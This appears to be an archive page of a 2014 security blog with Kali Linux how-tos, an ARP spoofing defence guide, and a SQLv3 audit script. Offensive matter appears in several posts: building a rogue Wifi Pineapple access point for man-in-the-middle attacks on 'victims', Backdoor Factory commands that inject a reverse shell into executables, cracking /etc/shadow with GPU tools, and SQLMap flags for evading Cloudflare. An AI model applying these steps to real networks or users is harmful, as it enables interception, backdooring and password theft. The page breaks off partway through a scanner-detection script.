Wednesday, December 17, 2014

HOWTO : Flash Plugin on Kali Linux 1.0.9a

Iceweasel

To install Flash :
apt-get install flashplugin-nonfree

To update Flash :
update-flashplugin-nonfree --install

Google Chrome

To install Flash :
apt-get install pepperflashplugin-nonfree

To update Flash :
update-pepperflashplugin-nonfree --install

That's all! See you.

Saturday, December 06, 2014

HOWTO : Fine Tune of iPad Mini 3 LTE

Personal Hotspot

By default, Personal Hotspot is hidden. You need to activate it by the following procedure :

(a) Settings - Cellular Data - Personal Hotspot - APN Settings - Personal Hotspot

(b) Enter some information at APN, Username and Password. That information does not need to be real data.

(c) Exit and return, you will find Personal Hotspot option on the menu.

Cellular Data and Wifi Connection Timeout

(a) Settings - Touch ID & Passcode

(b) Enable iPad Unlock, Enable Require Passcode

(c) Settings - General - Auto-Lock

(d) Set it to Never. If you cannot find "Never", you need to go to Settings - General - Reset - Reset All Settings.

(e) Enable Lock/Unlock

The internet connection will not time out or disconnect even if you close the Smart Case cover, unless you quit the application.

Make sure your MacBook Air's Energy Saving setting is set to "Never" when it is on battery. Meanwhile, set the Energy Saving setting to prevent the computer from sleeping when using the power adapter. However, I encountered some problems when connecting to the shared wifi. I think we should wait for the release of 10.10.2 for the wifi fix.

In addition, sharing the Personal Hotspot over Bluetooth is awesome. It is stable and fast, but with a distance limitation. It is the alternative to wifi sharing at the moment.

That's all! See you.

Friday, December 05, 2014

HOWTO : Sandboxing Firefox on Mac OS X Yosemite (10.10.1)

Step 1 :

Go to the Apple Apps Store to install the current version of XCode if you do not have it installed.

Step 2 :

Install Homebrew if you do not have it installed.

sudo ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"

To test whether the install succeeded :

brew doctor

Step 3 :

Install git if you do not have it installed.

brew install git

Step 4 :

cd /Users/Shared/

sudo git clone https://github.com/pansen/macos-sandbox-profiles.git

Step 5 :

cd /Applications/Firefox.app/Contents/MacOS/
sudo mv firefox-bin firefox-bin.real
sudo ln -sf /Users/Shared/macos-sandbox-profiles/bin/firefox-bin .


Step 6 :

Quit Firefox if it is still running (not just close the browser window) and then restart it.

That's all! See you.

Thursday, December 04, 2014

HOWTO : ArpON on Kali Linux 1.0.9a

ArpON (ARP handler inspection) is a portable handler daemon that makes the ARP protocol secure in order to prevent Man In The Middle (MITM) attacks through ARP Spoofing, ARP Cache Poisoning or ARP Poison Routing (APR). It also blocks the attacks derived from them, such as Sniffing, Hijacking, Injection and Filtering, and the more complex attacks built on those, such as DNS Spoofing, WEB Spoofing, Session Hijacking and SSL/TLS Hijacking.

Step 1 :

apt-get update
apt-get install arpon


Step 2 :

nano /etc/default/arpon

Uncomment the DAEMON_OPTS line for DARPI and the RUN line, so that the file looks like this :

DAEMON_OPTS="-q -f /var/log/arpon/arpon.log -g -d"
RUN="yes"


Step 3 :

Reboot your Kali Linux.

REFERENCE

ArpON - ARP Handler Inspection
Protect you from being ARP spoofing

That's all! See you.

HOWTO : ArpON on Mac OSX Yosemite (10.10.1)

ArpON (ARP handler inspection) is a portable handler daemon that makes the ARP protocol secure in order to prevent Man In The Middle (MITM) attacks through ARP Spoofing, ARP Cache Poisoning or ARP Poison Routing (APR). It also blocks the attacks derived from them, such as Sniffing, Hijacking, Injection and Filtering, and the more complex attacks built on those, such as DNS Spoofing, WEB Spoofing, Session Hijacking and SSL/TLS Hijacking.

Step 1 :

Go to the Apple Apps Store to install the current version of XCode if you do not have it installed.

Step 2 :

Install Homebrew if you do not have it installed.

sudo ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"

Step 3 :

To test whether the install succeeded :

brew doctor

Step 4 :

brew install git
brew install cmake
brew install libdnet
brew install libnet

brew link libdnet


Step 5 :

cd ~
sudo git clone git://git.code.sf.net/p/arpon/code arpon

sudo -sH
cd arpon
mkdir build
cd build
cmake -DCMAKE_INSTALL_PREFIX=/usr ..
make
make install


exit

Step 6 :

cd ~
nano arpon_startup

/usr/sbin/arpon -i en0 -D -q


chmod +x arpon_startup

Step 7 :

sudo nano /System/Library/LaunchDaemons/org.arpon.startup.plist



*** Please note that where "samiux" is my username, change to your username accordingly.

Step 8 :

Reboot your Mac.
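ArpON's DARPI mode checks ARP replies before they reach the cache. The following is an added example (shell, not ArpON's own code) that shows, from the host side, what a poisoned cache looks like: it compares two snapshots of the ARP table as printed by "arp -an" on Linux and macOS and reports any IP whose MAC changed and any MAC that answers for more than one IP. The snapshots are constructed to show the gateway being taken over; run it as is, or feed your own "arp -an" output to the functions.

```shell
#!/bin/sh
# Added example, not part of ArpON: look for the symptoms of ARP cache
# poisoning in two snapshots of the neighbour table as printed by "arp -an"
# on Linux and macOS. Both snapshots are constructed; in the second one the
# gateway's MAC has changed and one MAC now answers for two addresses.
ARP_BEFORE='? (192.168.1.1) at 00:11:22:aa:bb:cc [ether] on eth0
? (192.168.1.20) at 00:11:22:dd:ee:ff [ether] on eth0
? (192.168.1.66) at de:ad:be:ef:00:01 [ether] on eth0
? (192.168.1.99) at <incomplete> on eth0'

ARP_AFTER='? (192.168.1.1) at de:ad:be:ef:00:01 [ether] on eth0
? (192.168.1.20) at 00:11:22:dd:ee:ff [ether] on eth0
? (192.168.1.66) at de:ad:be:ef:00:01 [ether] on eth0'

# arp_pairs: reduce "arp -an" output on stdin to "ip mac" lines with the MAC
# lower-cased; incomplete entries carry no MAC and are skipped.
arp_pairs() {
    awk '/\(.*\) at [0-9a-fA-F:]+/ {
        ip = $2; gsub(/[()]/, "", ip)
        print ip, tolower($4)
    }'
}

# arp_mac_changes BEFORE AFTER: print "ip old_mac new_mac" for every address
# whose MAC differs between the two snapshots. The gateway changing MAC is
# the classic sign of another host answering for it.
arp_mac_changes() {
    after=$(printf '%s\n' "$2" | arp_pairs)
    printf '%s\n' "$1" | arp_pairs | while read -r ip mac; do
        new=$(printf '%s\n' "$after" | awk -v ip="$ip" '$1 == ip { print $2 }')
        if [ -n "$new" ] && [ "$new" != "$mac" ]; then
            printf '%s %s %s\n' "$ip" "$mac" "$new"
        fi
    done
}

# arp_duplicate_macs SNAPSHOT: print every MAC that claims more than one IP
# address, followed by the addresses it claims.
arp_duplicate_macs() {
    printf '%s\n' "$1" | arp_pairs | awk '
        { n[$2]++; ips[$2] = ips[$2] " " $1 }
        END { for (m in n) if (n[m] > 1) print m ":" ips[m] }'
}

# Stand-alone run over the constructed snapshots.
echo "MAC changes (ip old new):";  arp_mac_changes "$ARP_BEFORE" "$ARP_AFTER"
echo "MACs claiming several IPs:"; arp_duplicate_macs "$ARP_AFTER"
```

In practice, save the "arp -an" output of a clean network once and compare against it periodically (for example from cron); a gateway whose MAC changes, or one MAC answering for the gateway and another host, is the ARP spoofing symptom that ArpON is there to prevent.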

REFERENCE

ArpON - ARP Handler Inspection
Installing Homebrew on OS X Yosemite 10.10, Package Manager for Unix Apps
Protect you from being ARP spoofing

That's all! See you.

Tuesday, November 04, 2014

Blueberry - The Wifi Pineapple Mark V


Hardware

(1) TP-Link TL-MR3020 ver. 1.x (ver. 1.9 at the time of this writing)
(2) SanDisk Cruzer Fit USB Flash Drive (8GB)

Software

(1) OpenWrt
(2) Wifi Pineapple firmware
(3) Kali Linux 1.0.9a or Ubuntu Desktop 14.04 LTS

Wifi Pineapple is created by Hak5. It is a quite expensive device ($99.99 USD at the time of this writing). It is also known as Jasager (German for "Yes Man").

Wifi Pineapple is a rogue Wifi Access Point (AP) that answers "Yes" to all Wifi probe requests from mobile devices. When a Wifi client is looking for an open SSID (no matter what the SSID is) in a McDonald's restaurant or in a cafe, the Pineapple (or Jasager) replies "That's Me!". Once victims' mobile devices have connected to the Wifi Pineapple, you can carry out Man-in-the-Middle attacks against the victims.

Now, we are going to build your Wifi Pineapple for less than $25 USD (the TP-Link TL-MR3020 is about $20 USD while the SanDisk Cruzer Fit USB Flash Drive is about $5 USD) and in a very easy way.

Step 1 :

To download the OpenWRT (Attitude Adjustment 12.09 - at this time of writing) :

If you are doing a fresh install from the stock firmware of the TP-Link TL-MR3020 -
wget http://downloads.openwrt.org/attitude_adjustment/12.09/ar71xx/generic/openwrt-ar71xx-generic-tl-mr3020-v1-squashfs-factory.bin

If you are upgrading from a previously installed OpenWRT -
wget http://downloads.openwrt.org/attitude_adjustment/12.09/ar71xx/generic/openwrt-ar71xx-generic-tl-mr3020-v1-squashfs-sysupgrade.bin

Configure your computer to static IP address :

IP address : 192.168.0.10
Gateway : 192.168.0.1


Connect the TL-MR3020 to your computer with cable. The default IP address of stock TP-Link TL-MR3020 is 192.168.0.254. Then browse to the stock IP address.

The username and password of the stock TP-Link TL-MR3020 are both "admin".

Go to the "System Tools" -- "Firmware Upgrade" to upgrade from the just downloaded .bin file.

Step 2 :

Once upgraded to OpenWRT, your device's IP address will change to 192.168.1.1.

Configure your computer to static IP address :

IP address : 192.168.1.10
Gateway : 192.168.1.1


Then set the very STRONG root password at "System" -- "Administration".

Go to "System" -- "System" to set the timezone.

To enable wireless at "Network" -- "Wifi".

To enable DHCP, go to "Network" - "Interfaces" - "Edit", select "DHCP Client" and select "OpenWrt" by clicking "Switch Protocol". If the page takes a long time to reload, that is fine; it is because an IP address cannot be obtained yet. Just go ahead.

Now, connect your TL-MR3020 to the internet with an ethernet cable. Then, connect your computer to the TL-MR3020 via wifi; the SSID is "OpenWrt". Make sure you can access the internet.

Once you get the IP address, such as 192.168.1.100, you can connect to the TL-MR3020 via ssh.

ssh 192.168.1.100 -lroot

Enter your just created very STRONG root password.

Install the following packages :

opkg update
opkg install kmod-usb-storage
opkg install kmod-fs-ext4
opkg install block-mount


Step 3 :

Format your USB pendrive (8GB) as ext4 and swap, e.g. 2GB for swap (sda1) and 6GB for ext4 (sda2).

Then insert the USB pendrive to the TL-MR3020. Execute the following command line by line.

mkdir -p /mnt/sda2
mount /dev/sda2 /mnt/sda2
mkdir -p /tmp/cproot
mount --bind / /tmp/cproot
tar -C /tmp/cproot -cvf - . | tar -C /mnt/sda2 -xf -
umount /tmp/cproot
umount /mnt/sda2


Step 4 :

/etc/init.d/fstab enable
/etc/init.d/fstab start


vi /etc/config/fstab

Change the content as the following :

config mount
        option target /
        option device /dev/sda2
        option fstype ext4
        option options rw,sync
        option enabled 1
        option enabled_fsck 0

config swap
        option device /dev/sda1
        option enabled 1


The following are the vi commands, in case you are not familiar with vi :

i - go to the insert mode and ready for edit
Esc - exit from insert mode
:w - write the changes to the file
:q - quit the vi

Then type the following command to reboot the device :

reboot

Once it boots up again, log in to it via ssh.

To check if the USB pendrive is mounted as "/" or not :

mount
df


Step 5 :

Turn off the TL-MR3020 and take the USB Pendrive out from the TL-MR3020 and insert to your computer.

Back up the USB Pendrive to your computer.

mkdir mr3020
sudo cp -R /media/1234....1123/* ~/mr3020/
sudo cp -R ~/mr3020/lib ~/mr3020/lib-original


*** Where /media/1234....1123/ will be different on your system.

You also need to make a backup of the /lib directory.

Do not take out the USB Pendrive from your computer.

Step 6 (Pineapple firmware installation):

Download the upgrade package of Pineapple (upgrade-2.0.4.bin at the time of this writing) to your computer, such as Kali Linux or Ubuntu :

wget -O upgrade-2.0.4.bin https://wifipineapple.com/index.php?downloads&download_mk5_upgrade=2.0.4

When using Ubuntu, you should prefix the commands with "sudo". On Kali Linux it is not required.

Install firmware-mod-kit on your Kali Linux or Ubuntu if you do not have it :

sudo apt-get install firmware-mod-kit
sudo /opt/firmware-mod-kit/trunk/extract-firmware.sh upgrade-2.0.4.bin
cd fmk/rootfs


Copy the required directories to the USB Pendrive.

sudo cp -R bin/* /media/1234....1123/bin/
sudo cp -R sbin/* /media/1234....1123/sbin/
sudo cp -R usr/* /media/1234....1123/usr/
sudo cp -R etc/* /media/1234....1123/etc/
sudo cp -R www/* /media/1234....1123/www/
sudo cp -R pineapple /media/1234....1123/
sudo cp -R lib/firmware/* /media/1234....1123/lib/firmware/
sudo cp lib/* /media/1234....1123/lib/
sudo cp lib/wifi/* /media/1234....1123/lib/wifi/

sudo cp ~/mr3020/etc/config/fstab /media/1234....1123/etc/config/
sudo cp ~/mr3020/etc/passwd /media/1234....1123/etc/
sudo cp ~/mr3020/etc/shadow /media/1234....1123/etc/
sudo cp -R ~/mr3020/lib-original /media/1234....1123/


Step 6a :

To allow the victim to surf the internet via the Pineapple, you need to change the DNS and Gateway at /etc/config/network from 172.16.42.1 to 172.16.42.42, or change the DNS to 8.8.8.8.

Step 7 :

Insert back the USB Pendrive to TL-MR3020.

Switch on the TL-MR3020 and wait until it has booted up. Run the "wp5.sh" script (from Step 8) on your computer. Browse to the IP address shown on the screen. You will be asked to enter the password twice for the initial login. You should enter the previously set STRONG root password.

Step 8 (Connectivity) :

The following is one of the ways to use the Pineapple (TL-MR3020), by way of tethering :

Connect your laptop to internet via wireless or 3G.

Then connect the CAT5/5e/6 cable to the Pineapple and your laptop.

At the laptop, download the script.

wget http://www.wifipineapple.com/wp5.sh
chmod +x wp5.sh
sudo ./wp5.sh




Now, your computer (laptop) can access the internet and also the TL-MR3020. Victims can also access the internet when they are connected to your Pineapple.

When you want to reset what wp5.sh has set, you need to run the following script, which was created by me.

sudo ./killwp5.sh



When the TL-MR3020 is rebooted, you need to run wp5.sh again to regain access.

Important Note

There are THREE important things you should NOT do; otherwise, you will brick the TL-MR3020. They are :

First - Do NOT upgrade OpenWrt from the web interface, as the USB pendrive will not be mounted afterwards, unless you install the related packages again as stated above.

Second - Do NOT upgrade the Pineapple in the normal way (that is, via the web UI of the Pineapple). Make sure to keep away from the /lib directory. Or, if you have a backup, you can copy the /lib directory back.

Third - Do NOT long-press the "WPS/Reset" button on the TL-MR3020; otherwise, OpenWrt will be reset and the USB pendrive cannot be mounted, unless you install the related packages again as stated above.

Remarks

Victims need to have connected to an open wifi before; otherwise, Karma will not work.

Make sure the TL-MR3020 is version 1.x; other versions may brick the TL-MR3020.

The ONLY way to upgrade the Pineapple firmware is by following Step 6. In addition, you can upgrade from Mark IV (built by this tutorial) to Mark V by following Step 6 only.

Some infusions may not work on Blueberry, as it is not the original device. For example, (1) the WPS infusion does not work as designed on Blueberry, as it has only one wifi card: you cannot provide the internet connection to the victims and conduct WPS hacking at the same time. (2) PineAP and Reconnaissance on AP & Client do not work as designed on Blueberry, as it has only one wifi card too.

Known Issues

External Wifi Dongles, such as the Realtek 8187L, do not work even when the driver is installed and loaded. The limitation of Blueberry is that it cannot provide internet access to the victims and carry out the attacks at the same time (for some of the attacks), such as WPS attacks.

It is still worth trying the Blueberry before you consider purchasing an original Wifi Pineapple Mark V.

Reference

Wifi Pineapple Mark V -
Pineapple Mark V WiKi
Pineapple Forums
Hak5
PhiberOptics Youtube
Code injection to the downloading binaries

Wifi Pineapple Mark IV -
The beginners guide to breaking website security with nothing more than a Pineapple
Getting Started with the Wi-Fi Pineapple IV (Video)
Security4Plus Youtube Channel (Video)
How To: Configure a WiFi Pineapple For Use With Mac OS X (Video)
The Wifi Pineapple Book - Free Download
WiFi Pineapple – First Impression
You just can't trust wireless: covertly hijacking wifi and stealing passwords using sslstrip
All about WiFi Pineapple (Video)

That's all! See you.

Tuesday, October 28, 2014

Do Not Trust Your Download Even It Is From The Trusted Source

Joshua Pitts developed a tool suite for injecting backdoors into executable files for Windows, Linux, Mac OSX and FreeBSD. The process is fully automatic, even if you do not know what a code cave is.

The tool suite is named The Backdoor Factory and it also comes with a proxy to inject the backdoor while the victim is downloading the binaries - BDFProxy. BDFProxy works for the HTTP protocol only.

Joshua Pitts discovered that one of the Tor Network exit nodes was doing code injection into the binaries downloaded by victims via the Tor network. His blog post shows how it is done and the interview report talks about it.





How to install BDFactory on Kali Linux 1.0.9a?

BDFactory works very well with the Metasploit Framework.

apt-get update
apt-get dist-upgrade
apt-get autoclean
apt-get --purge autoremove

apt-get install python-pip


Install BDFactory :

cd ~
git clone https://github.com/secretsquirrel/the-backdoor-factory.git
cd the-backdoor-factory
./install.sh


To update :
./update.sh

Install BDFProxy :

cd ~
git clone https://github.com/secretsquirrel/BDFProxy.git
cd BDFProxy
./install.sh


To update :
./update.sh

Usage of BDFactory :

./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp


Usage of BDFProxy :

nano bdfproxy.cfg

*change the settings when necessary

./bdf_proxy.py

msfconsole -r bdfproxy_msf_resource.rc

*if you are working with the Pineapple, you need to run ./wpBDF.sh to configure your environment

Conclusion

Don't trust your downloaded binary, even if it is downloaded from a trusted source, when it is delivered via HTTP. Meanwhile, please download binaries over the Tor network with care.

Please DO NOT use this tool suite for illegal purposes; otherwise, you will be put in jail.
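Whether the tampering happens at a Tor exit node or through something like BDFProxy, the injected binary no longer matches the digest the publisher lists. The following is an added example (shell; not part of The Backdoor Factory or BDFProxy) of the check to run before executing any download: compare the SHA-256 of the file with a digest obtained out of band (over HTTPS, or from a signed release note). The "download" and its tampering are constructed inside the script.

```shell
#!/bin/sh
# Added example, not part of The Backdoor Factory or BDFProxy: verify a
# downloaded binary against a digest obtained out of band before running it.
# Code injected in transit changes the bytes, so the digest stops matching.

# sha256_of FILE: print the hex SHA-256 digest with whichever tool exists.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{ print $1 }'
    elif command -v shasum >/dev/null 2>&1; then
        shasum -a 256 "$1" | awk '{ print $1 }'
    else
        openssl dgst -sha256 "$1" | awk '{ print $NF }'
    fi
}

# verify_download FILE EXPECTED_SHA256: succeed only when the digest matches.
# Published digests come in either case, so the comparison is case-insensitive.
verify_download() {
    actual=$(sha256_of "$1") || return 2
    expected=$(printf '%s' "$2" | tr 'A-F' 'a-f')
    [ "$actual" = "$expected" ]
}

# demo_verify: constructed scenario. Write a "binary", record its digest the
# way a publisher would, then append bytes the way an injecting proxy would
# and check again.
demo_verify() {
    tmp=$(mktemp) || return 2
    printf 'original program bytes\n' > "$tmp"
    published=$(sha256_of "$tmp")               # digest listed by the publisher
    if verify_download "$tmp" "$published"; then clean=ok; else clean=mismatch; fi
    printf 'injected code cave payload\n' >> "$tmp"   # in-transit modification
    if verify_download "$tmp" "$published"; then tampered=ok; else tampered=mismatch; fi
    rm -f "$tmp"
    echo "clean=$clean tampered=$tampered"
}

demo_verify
```

Where the project publishes GPG signatures, gpg --verify on the detached signature is the stronger check, since a digest list served over plain HTTP could be rewritten by the same proxy.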

REFERENCE

Evasion of Anti-Virus with Veil Framework and The Backdoor Factory
Transparently proxify virtual machines
Transparent Proxy (Linux)
Framework for Man-In-The-Middle Attack
HOWTO : Protect You From Being ARP Spoofing

That's all! See you.

Thursday, October 16, 2014

VULNERABLE : Poodle SSLv3 Vulnerability

What is Poodle Vulnerability?

Google researchers have discovered a security vulnerability in SSL 3.0 that allows attackers to decrypt encrypted website connections. The details are here.

However, some security experts disagree that the bug is particularly serious and think that it only affects public wifi.

How to exploit it?

Daniel Fox Franke wrote a blog post explaining how to exploit the vulnerability.

How to test the browser's vulnerability?

Qualys provides an online tester for browsers. Or, you can try another online tester.

How to test the server's vulnerability?

Qualys provides an online test for servers.

How to fix the browser's vulnerability?

There is a tutorial showing you how to fix them.

How to fix the common servers' vulnerability?

There is a tutorial showing you how to fix the vulnerability on common servers.
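The fix on servers comes down to removing SSLv3 from the protocol list. The following is an added example (shell, not from the tutorials linked above) that shows the weak and the corrected nginx and Apache mod_ssl directives side by side, with a small audit function for each that reads a configuration and reports whether SSLv3 can still be negotiated. The configuration snippets are constructed; the assumption that nginx enables SSLv3 when no ssl_protocols directive is present applies to the 2014-era releases (before 1.9.1).

```shell
#!/bin/sh
# Added example, not from the page's tutorials: audit web server
# configuration text for SSLv3, the protocol POODLE targets, and show the
# weak directive beside the corrected one. Snippets are constructed; the
# directive names are the real nginx and Apache mod_ssl ones.
NGINX_WEAK='server {
    listen 443 ssl;
    ssl_protocols SSLv3 TLSv1 TLSv1.1 TLSv1.2;
}'
NGINX_FIXED='server {
    listen 443 ssl;
    ssl_protocols TLSv1 TLSv1.1 TLSv1.2;   # SSLv3 removed
}'
NGINX_DEFAULT='server {
    listen 443 ssl;
}'
APACHE_WEAK='SSLEngine on
SSLProtocol all -SSLv2'
APACHE_FIXED='SSLEngine on
SSLProtocol all -SSLv2 -SSLv3'

# nginx_allows_ssl3 CONFIG: succeed if SSLv3 is negotiable. Without an
# ssl_protocols directive, nginx before 1.9.1 included SSLv3 by default
# (assumption for the 2014-era builds this page targets).
nginx_allows_ssl3() {
    protos=$(printf '%s\n' "$1" |
        sed -n 's/^[[:space:]]*ssl_protocols[[:space:]]*\([^;]*\);.*/\1/p' | tail -n 1)
    if [ -z "$protos" ]; then
        return 0
    fi
    printf '%s\n' "$protos" | grep -qi 'SSLv3'
}

# apache_allows_ssl3 CONFIG: succeed if SSLv3 is negotiable. "all" included
# SSLv3 in the mod_ssl releases of that time; an explicit -SSLv3 wins.
apache_allows_ssl3() {
    protos=$(printf '%s\n' "$1" |
        sed -n 's/^[[:space:]]*SSLProtocol[[:space:]]*//p' | tail -n 1)
    case " $protos " in
        *" -SSLv3 "*) return 1 ;;
        *" all "*|*" ALL "*|*" +SSLv3 "*|*" SSLv3 "*) return 0 ;;
        "  ") return 0 ;;   # no directive at all: the default is "all"
    esac
    return 1
}

# report NAME CHECK CONFIG: one human-readable line per configuration.
report() {
    if "$2" "$3"; then echo "$1: SSLv3 ENABLED (vulnerable to POODLE)"
    else echo "$1: SSLv3 disabled"; fi
}

report nginx-weak    nginx_allows_ssl3  "$NGINX_WEAK"
report nginx-default nginx_allows_ssl3  "$NGINX_DEFAULT"
report nginx-fixed   nginx_allows_ssl3  "$NGINX_FIXED"
report apache-weak   apache_allows_ssl3 "$APACHE_WEAK"
report apache-fixed  apache_allows_ssl3 "$APACHE_FIXED"
```

The audit reads the text only; after changing the directive and reloading, confirm on the wire with the online server test mentioned above, since an include file or a default server block can still carry the old setting.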

That's all! See you.

Thursday, October 02, 2014

HOWTO : CUDA with Kali Linux 1.0.9

Hardware

CPU : Intel i7-3930K
RAM : 32GB DDR3
Hard Drive : 3TB
Display Card : Two nVidia GeForce GTX 590

Install Kali

Install Kali Linux 1.0.9 on the box as usual. Make sure "secure boot" is disabled in your BIOS before installing. After that, update Kali accordingly.

apt-get update
apt-get dist-upgrade


Install nVidia Driver

apt-get install -y linux-headers-$(uname -r)
apt-get install nvidia-kernel-dkms nvidia-cuda-toolkit nvidia-xconfig

nvidia-xconfig

sed 's/quiet/quiet nouveau.modeset=0/g' -i /etc/default/grub
update-grub
reboot


Fix the nvidia_uvm error

After the reboot :

cd /usr/src/nvidia-current-331.67
make

cp Module.symvers uvm/
make -C uvm

cp uvm/nvidia-uvm.ko /lib/modules/`uname -r`/updates/dkms


Install cudaHashcat

mkdir hacking
cd hacking

wget http://hashcat.net/files/cudaHashcat-1.30.7z

7za x cudaHashcat-1.30.7z


Test the cudaHashcat

cd /root/hacking/cudaHashcat-1.30/
./cudaExample0.sh

cd /root/hacking/cudaHashcat-1.30/
./cudaExample400.sh

cd /root/hacking/cudaHashcat-1.30/
./cudaExample500.sh


Install John the Ripper

apt-get install libssl-dev

cd hacking

wget http://www.openwall.com/john/g/john-1.7.9-jumbo-7.tar.gz
tar -xvzf john-1.7.9-jumbo-7.tar.gz
cd john-1.7.9-jumbo-7/src

make
make clean linux-x86-64-cuda


** If your hashes or passwords are longer than 8 characters, you need to change the following before compiling John.

cd john-1.7.9-jumbo-7/src
nano params.h


Then change "8" to "18" or "20", etc.

#define CHARSET_LENGTH 8

Test the John the Ripper

cd /root/hacking/john-1.7.9-jumbo-7/run

./john --device=0,1,2,3 --format=sha512crypt-cuda /etc/shadow


* Since I have 4 GPUs, the --device option lists all 4.

*** When you have changed the CHARSET_LENGTH, you need to generate a new charset. Do it once only.

wget http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2
bunzip2 -d rockyou.txt.bz2
cp rockyou.txt /root/hacking/john-1.7.9-jumbo-7/run

cd /root/hacking/john-1.7.9-jumbo-7/run

cat rockyou.txt | sed 's/^/:/' > rockyou.pot

mv all.chr all.chr-original
mv alnum.chr alnum.chr-original
mv alpha.chr alpha.chr-original
mv digits.chr digits.chr-original
mv lanman.chr lanman.chr-original

./john --pot=rockyou.pot --make-charset=all.chr
./john --pot=rockyou.pot --make-charset=alnum.chr --external=filter_alnum
./john --pot=rockyou.pot --make-charset=alpha.chr --external=filter_alpha
./john --pot=rockyou.pot --make-charset=digits.chr --external=filter_digits
./john --pot=rockyou.pot --make-charset=lanman.chr --external=filter_lanman


Then your cracking command will be :

./john --pot=rockyou.pot --device=0,1,2,3 --format=sha512crypt-cuda /etc/shadow

Install and Test Cryptohaze

cd hacking
wget http://sourceforge.net/projects/cryptohaze/files/Cryptohaze-Linux_x64_1_31a.tar.bz2/download -O Cryptohaze-Linux_x64_1_31a.tar.bz2

tar xjvf Cryptohaze-Linux_x64_1_31a.tar.bz2

cd /root/hacking/Cryptohaze-Linux
./Cryptohaze-Multiforcer -h NTLM -c charsets/charsetall -f test_hashes/Hashes-NTLM-Full.txt


That's all! See you.

Wednesday, October 01, 2014

HOWTO : Uninstall a specific software/package in Kali Linux 1.0.9

Since I needed to run Ollydbg for a while, I installed Wine in Kali Linux. When I no longer required Ollydbg, I wanted to uninstall Wine. However, Wine has a lot of dependencies. When you uninstall Wine with the following command, you will uninstall a lot of software or packages that may be useful to you, such as Gnome.

apt-get --purge remove wine

A safer way to uninstall Wine is the following :

dpkg --remove --force-depends wine-bin
dpkg --remove --force-depends wine


That's all! See you.

Sunday, September 28, 2014

Kali Linux Nexus NetHunter

The official site is here. The setup guide is here.


Kali Linux NetHunter HID Attack from Offensive Security on Vimeo.

A quick demonstration of the Kali Linux NetHunter HID attack (Teensy like), by Offensive Security.



Kali Linux NetHunter "Bad USB" MITM Attack from Offensive Security on Vimeo.

The Kali Linux NetHunter implementation of the "Bad USB" MITM attack as demonstrated by the guys from srlabs.de at BlackHat 2014.




That's all! See you.

Thursday, September 04, 2014

REVIEW : ZOTAC ZBOX C1320 Nano Plus

I am going to test ZOTAC ZBOX C1320 Nano Plus with Kali Linux 1.0.9 64bit.

CPU : Intel Celeron N2930 (Quad-core, 1.83GHz, up to 2.16GHz)
GPU : Intel HD Graphic
RAM : 1 x DDR3L-1333 SO-DIMM (2GB Included)
HDD : 1 x 2.5-inch SATA 3.0Gb/s (64GB SSD Included)
Ethernet : Realtek Gigabit LAN
Wireless : IEEE802.11ac Intel Wifi
Bluetooth : 4.0
Remarks : 1 x SD/SDHC/SDXC Card Reader, 1 x HDMI, 1 x DisplayPort, 1 x eSATA, 4 x USB 3.0, 2 x USB 2.0

You can select UEFI or BIOS when doing setup. You also can disable the Secure Boot.

Kali Linux 1.0.9 64bit boots up without problems. However, the wifi only partially works: it detects the signal but does not work. Bluetooth malfunctions too. 1080p MKV video cannot be played on a default Kali Linux install. The CPU has no Hyper-Threading feature. However, this box can use standard DDR3 RAM up to 8GB; you are not required to use DDR3L RAM. Meanwhile, the sound card is quite good.

This box works very well with VMWare Workstation 10.x (64-bit). 64bit guest virtual machines work properly.

The power consumption is between 13W and 20W.

I recommend this box for its low power consumption with high performance.

Update :

HD video playback needs the following drivers. However, the chipset is too new and they cannot be loaded properly :

sudo apt-get install i965-va-driver libva-intel-vaapi-driver vainfo

That's all! See you.

Tuesday, August 19, 2014

HOWTO : SQLMap for Cloudflare protected sites

When you suspect your target site is vulnerable to SQLi and you find out that it is protected by Cloudflare, you can still launch SQLMap against the target.

First of all, you need to make sure the target site is protected by Cloudflare; you can add "--identify-waf" or "--check-waf" to confirm. However, do not set "--threads=" larger than 1, as the target will give you a "403 Forbidden" error. Once you get the "403 error", your IP address is banned. Therefore, you need to consider using proxy servers or TOR to access the target.

Secondly, you need to add "--tamper='between,randomcase,space2comment'" and "-v 3" if the target is confirmed to be protected by Cloudflare. You may also consider adding "--random-agent" and "--tor" when necessary.

Finally, do not use the SQLMap scripts provided by Kali Linux, as they have no "WAF" scripts pre-installed. You had better download the latest version of SQLMap from the official site.

git clone https://github.com/sqlmapproject/sqlmap.git

This hint can also be applied to other WAFs, IDSs and IPSs, such as mod_security or other Cloudflare-like service providers.

For example :

python sqlmap.py -u "https://www.cloudflare.com/" --check-waf --tamper="between,randomcase,space2comment" -v 3 --random-agent --tor

That's all! See you.

Friday, July 18, 2014

Defend your Network and Servers

Intruders conduct reconnaissance on your network and servers before performing an attack. After that, they perform the attack based on the information in hand.

In my opinion, the best way to defend your network and servers from being attacked is to interfere with the intruders' reconnaissance. When intruders cannot get any valuable information, they cannot perform the attack properly.

Most intruders use automated tools, such as vulnerability scanners, to perform the reconnaissance and seldom do it manually, as that is harder for them, especially for web applications. However, a small portion of advanced intruders may do it manually.

Hiawatha, a secure and advanced web server, can be configured to block vulnerability scanners from scanning the web server. Since the vulnerability scanners then do not work properly, intruders cannot get any valuable information about the web server in order to launch an attack.

Suricata, a high performance network IDS, IPS and network security monitoring engine, used with the Emerging Threats rules, can be configured to drop the packets of vulnerability scanners.

A Web Application Firewall (WAF) and an Intrusion Detection/Prevention System (IDS/IPS), as well as a firewall, can be bypassed by some advanced intruders. Therefore, blocking vulnerability scanners is one of the good ways to defend your network and servers from being attacked.
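To see what blocking scanners means in practice, the following is an added example (shell, not Hiawatha's or Suricata's own logic) that runs two detections over web server access-log lines in the combined log format: a User-Agent match for the well-known scanners, and a per-client count of 404 responses, which also catches the advanced intruder who sets a browser User-Agent but still guesses paths. The log lines are constructed; the User-Agent strings follow the format the real tools send.

```shell
#!/bin/sh
# Added example, not Hiawatha's or Suricata's own logic: two checks over
# access-log lines (combined log format) that surface scanner reconnaissance.
# The log lines below are constructed.
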